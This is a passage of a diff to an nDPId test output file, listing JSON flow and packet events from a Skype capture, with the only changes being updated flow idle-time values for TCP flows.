00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4pYYAAEARPZvAqAEinTc4kjLdgQkAJLU7nG4Cyw+0E3ewR9IGP0eBLCPkEu6cvusCSULx8g=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2L4AAEARJivAqAEib91KHDLdnE4ALJRcnHACG8tsqKlSc3O3hWaMTNmN0BY4DMi8SBQzDHozUa6r8phn"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683081,"flow_last_seen":1431969683081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683081,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431969683081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683081,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOCFAAEAGavXAqAEinTc4oMOVAbs\/vddwAAAAALAC\/\/9bFwAAAgQFtAEDAwUBAQgKPiMpogAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1431969683227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683227,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIgG7w5UO87UwP73XcaASOJCODAAAAgQFrAQCCApNfpPQPiMpogEDAwk="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1431969683227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683227,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+rpAAEAGqGfAqAEinTc4oMOVAbs\/vddxDvO1MYAQECzkpQAAAQEICj4jKjNNfpPQ"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683081,"flow_last_seen":1431969683081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683081,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431969683081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683081,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOCFAAEAGavXAqAEinTc4oMOVAbs\/vddwAAAAALAC\/\/9bFwAAAgQFtAEDAwUBAQgKPiMpogAAAAAEAgAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1431969683227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683227,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIgG7w5UO87UwP73XcaASOJCODAAAAgQFrAQCCApNfpPQPiMpogEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1431969683227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683227,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+rpAAEAGqGfAqAEinTc4oMOVAbs\/vddxDvO1MYAQECzkpQAAAQEICj4jKjNNfpPQ"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLY\/4AAEARkzDAqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLbZEAAEARiZ3AqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjFBAAEAGzLvAqAEinTeCqsOWnFJsNFWpAAAAALAC\/\/\/KJgAAAgQFtAEDAwUBAQgKPiMrQAAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjFBAAEAGzLvAqAEinTeCqsOWnFJsNFWpAAAAALAC\/\/\/KJgAAAgQFtAEDAwUBAQgKPiMrQAAAAAAEAgAA"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAAygKMAAEARGILAqAEinTeClDLdnFMAHuO+nHICw5e0uFvnoh7r2z7q0Ash9G6vuA=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -618,8 +618,8 @@ 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1nZ0AAEARXdnAqAEib91NmjLdnFEAIcopnHYCxd71ZoU+BTO6L2LN9kiyomjWgPGl4A=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431969683623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIpxSw5bt8UdnbDRVqqASOJAWbAAAAgQFrAQCCApOqggfPiMrQAEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431969683623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683623,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bWZAAEAG67HAqAEinTeCqsOWnFJsNFWq7fFHaIAQECxtGQAAAQEICj4jK71Oqggf"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431969683623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIpxSw5bt8UdnbDRVqqASOJAWbAAAAgQFrAQCCApOqggfPiMrQAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431969683623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683623,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bWZAAEAG67HAqAEinTeCqsOWnFJsNFWq7fFHaIAQECxtGQAAAQEICj4jK71Oqggf"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431969684467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969684467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA16v8AAEARrgrAqAEinTeCrDLdnFMAIRT0nHgCu2bzH4JB7obGwPAa3nMCpmcjtPyNNg=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -628,10 +628,10 @@ 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1072,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqeAAAEARTU7AqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1073,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLQlQAAEARtNrAqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685111,"flow_last_seen":1431969685111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969685111,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1431969685111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969685111,"pkt":"0NQSxnP1PBXCt3IOCABFAABAAC9AAEAGWN3AqAEinTeCqsOYAbvnclCjAAAAALAC\/\/\/oPwAAAgQFtAEDAwUBAQgKPiMxhAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1431969685234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969685234,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIgG7w5jP+27153JQpKASOJApWgAAAgQFrAQCCApOqgmyPiMxhAEDAwk="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1431969685234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969685234,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0w75AAEAGlVnAqAEinTeCqsOYAbvnclCkz\/tu9oAQECyACwAAAQEICj4jMf1Oqgmy"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685111,"flow_last_seen":1431969685111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969685111,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1431969685111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969685111,"pkt":"0NQSxnP1PBXCt3IOCABFAABAAC9AAEAGWN3AqAEinTeCqsOYAbvnclCjAAAAALAC\/\/\/oPwAAAgQFtAEDAwUBAQgKPiMxhAAAAAAEAgAA"} 
